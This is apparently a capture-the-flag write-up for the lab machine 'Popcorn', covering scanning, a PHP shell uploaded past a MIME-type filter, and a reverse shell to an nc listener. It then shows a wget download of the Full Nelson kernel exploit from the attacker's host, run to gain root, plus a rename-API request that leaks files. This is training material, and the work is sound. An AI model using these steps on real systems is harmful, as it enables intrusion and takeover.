Popcorn

OS: Linux, Difficulty: Medium, IP: 10.10.10.6

Initial enumeration

# Nmap 7.80 scan initiated Mon Sep 30 20:55:45 2019 as: nmap -sV -sC -O -A -oN O-Detailed -p 22,80 10.10.10.6
Nmap scan report for 10.10.10.6
Host is up (0.21s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 3e:c8:1b:15:21:15:50:ec:6e:63:bc:c5:6b:80:7b:38 (DSA)
|_ 2048 aa:1f:79:21:b8:42:f4:8a:38:bd:b8:05:ef:1a:07:4d (RSA)
80/tcp open http Apache httpd 2.2.12 ((Ubuntu))
|_http-server-header: Apache/2.2.12 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 2.6.17 - 2.6.36 (95%), Linux 2.6.30 (95%), Linux 2.6.32 (95%), Linux 2.6.35 (95%), Android 2.3.5 (Linux 2.6) (95%), Linux 2.4.20 (Red Hat 7.2) (95%), Linux 2.6.17 (95%), Canon imageRUNNER ADVANCE C3320i or C3325 copier (94%), Epson WF-2660 printer (94%), AVM FRITZ!Box FON WLAN 7240 WAP (94%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 219.17 ms 10.10.14.1
2 221.41 ms 10.10.10.6
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Sep 30 20:56:06 2019 -- 1 IP address (1 host up) scanned in 21.40 seconds

Only 2 ports are open and we don't have any credentials for the SSH port so the obvious choice will be to go after the web server and get all possible directory listings.

/index (Status: 200) # Nothing juicy
/test (Status: 200) # PHP Test page
/test.php (Status: 200) # PHP Test page
/torrent (Status: 301) # PRIMARY FOCUS
/rename (Status: 301) # Cool, info-leak vector

So we focus on the torrent directory and see what are we working with.

Index page for the torrent application.

We have the option to login and signup, so we'll go ahead and signup and get an account to explore more vectors. After login we have the capability to upload a torrent file.

However, I was having trouble getting a new torrent file to upload, so I downloaded the already existing torrent file from the website and modified it using the following 2 tools, and verified if everything was fine and then was able to upload it.

After successful upload, I have an option to edit the torrent and add a screenshot to the description. This is the vector that I exploited to get RCE.

To by-pass the upload filter, all you have to do is intercept the request with burp and modify the file type to any of the image formats, I chose image/png and my PHP shell was uploaded successfully.

Once the shell is up, we can navigate to the /torrent/upload/ folder and lookout for a file with .php extension and we can run it to get our reverse shell.

$ nc -lvnp 5555
listening on [any] 5555 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.6] 50548
Linux popcorn 2.6.31-14-generic-pae #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009 i686 GNU/Linux
20:15:47 up 5 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM [email protected] IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

User own

$ cd /home
$ ls -al
total 12
drwxr-xr-x 3 root root 4096 Mar 17 2017 .
drwxr-xr-x 21 root root 4096 Sep 30 18:58 ..
drwxr-xr-x 3 george george 4096 Mar 17 2017 george
$ cd george
$ ls -la
total 872
drwxr-xr-x 3 george george 4096 Mar 17 2017 .
drwxr-xr-x 3 root root 4096 Mar 17 2017 ..
-rw------- 1 root root 2769 May 5 2017 .bash_history
-rw-r--r-- 1 george george 220 Mar 17 2017 .bash_logout
-rw-r--r-- 1 george george 3180 Mar 17 2017 .bashrc
drwxr-xr-x 2 george george 4096 Mar 17 2017 .cache
-rw------- 1 root root 1571 Mar 17 2017 .mysql_history
-rw------- 1 root root 19 May 5 2017 .nano_history
-rw-r--r-- 1 george george 675 Mar 17 2017 .profile
-rw-r--r-- 1 george george 0 Mar 17 2017 .sudo_as_admin_successful
-rw-r--r-- 1 george george 848727 Mar 17 2017 torrenthoster.zip
-rw-r--r-- 1 george george 33 Mar 17 2017 user.txt
$ cat user.txt
5e36a***

Root own

I ran Linux Smart Enumeration scripts and tried some manual intervention as well, however there was nothing left than to exploit the kernel itself, as it was pretty old Ubuntu 9.10. So I went with Full Nelson.

[email protected]:/tmp$ wget http://10.10.14.10/fn.c
wget http://10.10.14.10/fn.c
--2019-09-30 20:23:57-- http://10.10.14.10/fn.c
Connecting to 10.10.14.10:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 9487 (9.3K) [text/plain]
Saving to: `fn.c'
100%[======================================>] 9,487 40.1K/s in 0.2s
2019-09-30 20:23:57 (40.1 KB/s) - `fn.c' saved [9487/9487]
[email protected]:/tmp$ gcc fn.c -o fn
gcc fn.c -o fn
./fn
[*] Resolving kernel addresses...
[+] Resolved econet_ioctl to 0xf840a280
[+] Resolved econet_ops to 0xf840a360
[+] Resolved commit_creds to 0xc01645d0
[+] Resolved prepare_kernel_cred to 0xc01647d0
[*] Calculating target...
[*] Triggering payload...
[*] Got root!
# id
id
uid=0(root) gid=0(root)
# cat /root/root.txt
cat /root/root.txt
f1223***
#

Learning outcome

Kernel exploits are not at all pretty, they are very unstable and makes life difficult. I had to reset the box 2-3 times before I got a working kernel exploit that popped the shell. So try to refrain from these as much as possible.

Another cool thing that I came across was the /rename page, that had some very interesting output. I saw no other writeup mention this, I am not sure of the reason but this vector potentially renders the whole torrent and bypassing it very easy.

Using this API we can leak all the source code of the /torrent or any other file for that matter.

# Request
http://10.10.10.6/rename/index.php?filename=/var/www/torrent/index.php&newfilename=/var/www/test.txt
# Checkout test.txt file and we'll have index.php source-code.

And once the index file is moved from the torrent folder, whole folder becomes a huge index and you can use this to get source of all the files.

However, do note, to reverse the rename API effect by switching the parameters after each use, as not doing this will move out all the files and you'll be left with a non-working machine state and the final option will be to reset the box to get it working back again.